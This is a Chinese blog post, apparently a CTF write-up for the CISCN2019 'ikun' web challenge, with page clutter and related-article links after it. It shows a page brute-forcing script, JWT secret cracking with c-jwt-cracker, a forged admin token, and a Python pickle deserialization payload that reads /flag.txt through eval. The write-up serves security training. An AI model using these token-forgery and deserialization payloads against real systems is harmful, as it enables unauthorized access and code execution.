[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2024-04-11 09:36:34 发布
最新推荐文章于 2024-04-11 09:36:34 发布
阅读量977 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: 基础练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127825839
版权 
知识点:pickle ,jwt 伪造,爆破密钥

分析

page 参数爆破一下,在 181 页有 lv6。

import requests
url = 'http://35a050dd-3910-4ff7-a152-cfd976289c2b.node4.buuoj.cn:81/shop?page='

for i in range(1000):
    req = requests.get(url=url+str(i))
    if 'lv6.png' in req.text:
        print(i)
        break

在结算处可以改折扣数,但不知道为什么不能白嫖
在这里插入图片描述
访问 /b1g_m4mber 熟悉的页面,直接看 cookie

在这里插入图片描述
嗯,考点很显眼
在这里插入图片描述

这边无签名攻击行不通了,看了 wp 才知道可以爆破密钥

jwt爆破密钥

使用 c-jwt-cracker 爆破

c-jwt-cracker 安装坑

到 c-jwt-cracker 目录下直接 make,如果显示如下报错。
在这里插入图片描述
运行如下命令

sudo apt-get update
sudo apt-get install libssl-dev

最后 make

爆破密钥

在这里插入图片描述
使用 密钥 1Kun 加密 ,修改 username 为 admin

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

以 admin 访问后,在网页源码处有提示,有个源码压缩包
在这里插入图片描述

getflag

在 setting.py 处有提示,告诉我们有后门
在这里插入图片描述
最后在 Admin.py 里看到一个 pickle 反序列化漏洞
在这里插入图片描述
os.system和os.popen 都用不了,最后看来大佬们的使用 eval

import pickle
import urllib.parse

class exp(object):
    def __reduce__(self):
        return (eval,("open('/flag.txt').read()",))

a=exp()
s=pickle.dumps(a,protocol=0)
print(urllib.parse.quote(s))

在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JWT渗透与攻防(一)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-24 1687
Json web token (JWT)相关漏洞对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等,在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名。
ubuntu/kali安装c-jwt-cracker及使用方法
m0_61025358的博客
12-01 2594
ubuntu/kali安装c-jwt-cracker及使用方法 c-jwt-cracker介绍: c-jwt-cracker是用 C 语言编写的多线程 JWT 暴力破解程序(所以在运行它的时候你的CPU可能会出现100%使用的情况)。
JWT攻击实战
不想当脚本小子的脚本小子
06-07 879
事情是这样的,这个 token 让我觉得很突兀,通常 token 要么用作身份凭证、要么用于防 CSRF,若是前者,就不应该与同样表示身份凭证的 cookie 同时存在,若是后者,通常为 16 位或 32 位的哈希值,而非用点号分隔的三段 base64。于是,我依次将每段解码: ...
探秘JWT Cracker:轻松解密JSON Web Tokens的安全神器
最新发布
gitblog_00090的博客
04-11 471
探秘JWT Cracker:轻松解密JSON Web Tokens的安全神器 项目地址:https://gitcode.com/lmammino/jwt-cracker 在现代Web应用中,JSON Web Tokens(JWTs)被广泛用于身份验证和授权,它们小巧、自包含且易于传输。然而,如果安全措施不到位,JWT也可能成为攻击者的突破口。JWT Cracker是一个开源工具,专为开发者设计,用...
c-jwt-cracker:用C编写的JWT蛮力饼干
02-06
c-jwt-cracker:用C编写的JWT蛮力饼干
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
ikun.exe
10-19
ikun.exe
ikun电脑桌面宠物.exe
09-22
ikun电脑桌面宠物.exe
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
测试一下你是不是IKUN
10-05
代码秀:你干嘛!!!哎呦!!!
CTFHUB JWT(Json Web Token)
weixin_63231007的博客
11-04 1856
然后看到decode函数这里它本质上使用的还是JWT上的编码的方法,使用的的KEY值是PUBLIC_KEY,也就是题目给出的提示公钥,发现在 JWTHelper类中,decode()、encode()默认的加密解密方式都为“HS256”根据这个条件我们需要编写一个python代码来生成token。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
ctfshow_JWT
qq_45951598的博客
10-14 336
文章目录JWT简介WEB345 JWT简介 Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。 JSON Web Token 入门教程 JWT简要介绍
渗透测试-JWT攻击
cdyunaq的博客
01-18 6163
1.jwt是什么 Json web token(JWT),是为了在网络应用环境间传递声明而执行的一中基于JSON的开放标准。常用于分布式站点的单点登录。 JWT的声明一般被用在客户端与服务端之间传递身份认证信息,便于向服务端请求资源。 1.1.原理 1)客户端提交用户名密码等信息到服务端请求登录,服务端在验证通过后前发一个具有时效性的token,将token返回给客户端 2)客户端收到token后会将token存储在cookie或localStorage中 3)随后客户端每次请求都会携带这个to
网安学习-CTF夺旗
weixin_44770698的博客
08-26 2176
网安学习-CTF(Python反序列化+JWT
2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 779
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
攻击JSON Web Token (JWT)
公众号shadow sock7
06-19 1120
方法一: $ git clone https://github.com/brendan-rius/c-jwt-cracker $ cd c-jwt-cracker/ $ make $ ./jwtcrack XXX 方法二: 参考: https://xz.aliyun.com/t/2338 >>> import jwt >>> encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') 'e
每天搞懂一个小漏洞——jwt
qq_54030686的博客
01-17 3020
每天搞懂一个小漏洞——jwt jwt漏洞成因:用户成功登录后,服务端会返回一段加密后的数据用于替代cookie的作用,当下一次打开此登录页面时候,客户端会将这一段数据自动发送给服务器端,服务器端根据收到的这一段数据,返回不同的页面,基本功能与cookie类似 jwt和cookie都是成功登录后服务器端返回客户端的一段数据, 下次登录时避免重新输入账号密码之类,提高用户体验 cookie本身不具有危害性,但是通过其他手段xss等获取到对方相关网站的cookie后,即可实现免密码登录, jwt由于加密的特殊性可
Jwt安装配置
Passerby_one的博客
10-05 567
1.登录接口 2.刷新接口 3.自定义返回格式 1.JWT安装配置 1.1 安装JWT pip install djangorestframework-jwt==1.11.0 1.2 syl/settings.py 配置jwt载荷中的有效期设置 # jwt载荷中的有效期设置 JWT_AUTH = { # 1.token前缀:headers中 Authorization 值的前缀 'JWT_AUTH_HEADER_PREFIX': 'JWT', # 2.token有效期:一天有效
ikun python
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐播放器。在ikun音乐播放器中,可以切换音乐下一首,并且可以通过完善添加排序功能来对音乐进行排序。通过打开指定文件夹获取所有音乐文件的名称,可以获取当前播放的音乐名称。通过加载和播放音乐文件,可以实现音乐的播放功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值